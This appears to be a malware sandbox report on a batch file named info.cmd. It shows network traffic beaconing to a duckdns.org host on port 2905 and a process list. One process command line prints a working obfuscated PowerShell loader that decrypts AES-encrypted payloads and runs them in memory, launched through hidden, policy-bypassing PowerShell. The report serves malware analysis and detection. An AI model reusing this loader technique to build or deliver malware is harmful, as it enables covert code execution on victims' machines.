                              May 23, 2024 21:09:50.443540096 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:50.448703051 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:50.954253912 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:50.962604046 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:50.983860016 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:50.990148067 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:51.755917072 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:51.761071920 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:52.225498915 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:52.230709076 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:52.943166018 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:52.948879004 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:54.898925066 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:54.903973103 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:55.959662914 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:55.964595079 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.091708899 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.096715927 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.125965118 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.131097078 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.313436985 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.318737030 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.344788074 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.349803925 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.374300957 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.379442930 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.445380926 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.454370975 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.493303061 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.498434067 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:56.799329996 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:56.804343939 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:57.681392908 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:57.688452959 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.280514002 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.285762072 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.559689045 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.583712101 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.754039049 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.759022951 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.773380041 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.826320887 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.851855040 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.856995106 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:58.968609095 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:58.974314928 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:59.031891108 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:59.036917925 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:09:59.937979937 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:09:59.944041967 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:00.873847961 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:00.890592098 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:01.835768938 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:01.840804100 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:01.961581945 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:01.966783047 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:02.376735926 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:02.382531881 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:03.742707968 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:03.748027086 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:03.759512901 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:03.765516043 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:03.777072906 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:03.782414913 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:03.891226053 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:03.896712065 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:03.971925974 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:03.983593941 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:04.073246956 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:04.078305960 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:04.294488907 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:04.300498009 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:05.086494923 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:05.091434002 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:05.105556011 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:05.110968113 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:05.142652988 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:05.147773027 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:05.281414032 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:05.378396034 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:07.640044928 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:07.647032976 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:07.744411945 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:07.752892017 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:07.818716049 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:07.823729992 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:09.572619915 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:09.577647924 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:09.616997004 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:09.622385025 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:09.657233953 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:09.662470102 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:09.678586960 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:09.683783054 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:09.778964043 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:09.784028053 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:10.754108906 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:10.818192005 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.482639074 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.487627029 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:11.542262077 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.547262907 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:11.559098005 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.564245939 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:11.730710030 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.735743046 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:11.849292994 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:11.854535103 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:12.378704071 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:12.383806944 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:13.116369963 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:13.122278929 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:13.737658024 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:13.743273020 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:13.912302017 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:13.917399883 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.125472069 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.130533934 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.148160934 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.153284073 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.205126047 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.262576103 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.479074001 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.484141111 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.518436909 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.523950100 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:15.532270908 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:15.537395000 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.153650045 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.158895016 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.198106050 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.219053030 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.262394905 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.270672083 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.317738056 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.323308945 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.383676052 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.388771057 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.399244070 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.406641006 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.467500925 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.474052906 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.533432007 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.538546085 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.575182915 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.580261946 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:17.749890089 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:17.755023956 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:18.821840048 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:18.827155113 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:19.129909992 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:19.134919882 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:19.164164066 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:19.169436932 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:19.222078085 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:19.227166891 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:19.270199060 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:19.278294086 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:20.633621931 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:20.671370983 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.225199938 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.230490923 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.267250061 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.274734020 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.283040047 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.303472042 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.485764980 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.493555069 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.577498913 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.585184097 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.683726072 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.689677954 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.926232100 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.933409929 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:21.957010984 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:21.965725899 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:22.505986929 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:22.510878086 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:23.176621914 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:23.181998968 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:23.276747942 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:23.281784058 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:23.360358953 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:23.365427017 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:23.560025930 CEST497052905192.168.2.8163.172.59.233
May 23, 2024 21:10:23.565157890 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:23.705950975 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:23.711102962 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:23.717935085 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:23.723970890 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:23.962449074 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:23.967780113 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:24.600070000 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:24.605079889 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:25.191529036 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:25.197824001 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:25.392600060 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:25.398861885 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:26.737682104 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:26.750336885 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.140489101 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.146279097 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.161422968 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.166440010 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.209532976 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.264590025 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.310131073 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.315012932 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.500720024 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.506644964 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:27.559436083 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:27.564400911 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:28.056833982 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:28.061739922 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:28.399739981 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:28.406732082 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:29.193239927 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:29.198187113 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:29.276063919 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:29.282537937 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:29.410434008 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:29.415255070 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:29.479253054 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:29.484128952 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:35.538870096 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
May 23, 2024 21:10:35.544225931 CEST | 2905 | 49705 | 163.172.59.233 | 192.168.2.8
May 23, 2024 21:10:38.423813105 CEST | 49705 | 2905 | 192.168.2.8 | 163.172.59.233
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 21:07:31.580298901 CEST | 52909 | 53 | 192.168.2.8 | 1.1.1.1
May 23, 2024 21:07:31.720669031 CEST | 53 | 52909 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:07:31.580298901 CEST | 192.168.2.8 | 1.1.1.1 | 0x3f85 | Standard query (0) | newremisco2905.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:07:31.720669031 CEST | 1.1.1.1 | 192.168.2.8 | 0x3f85 | No error (0) | newremisco2905.duckdns.org | | 163.172.59.233 | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 15:07:19
Start date: 23/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "
Imagebase: 0x7ff728770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 15:07:19
Start date: 23/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 15:07:19
Start date: 23/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c "set __=^&rem"
Imagebase: 0x7ff728770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 15:07:20
Start date: 23/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
Imagebase: 0x7ff728770000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 15:07:20
Start date: 23/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 15:10:28
Start date: 23/05/2024
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"
Imagebase: 0x7ff61d450000
File size: 229'728 bytes
MD5 hash: 74A0194782E039ACE1F7349544DC1CF4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

No disassembly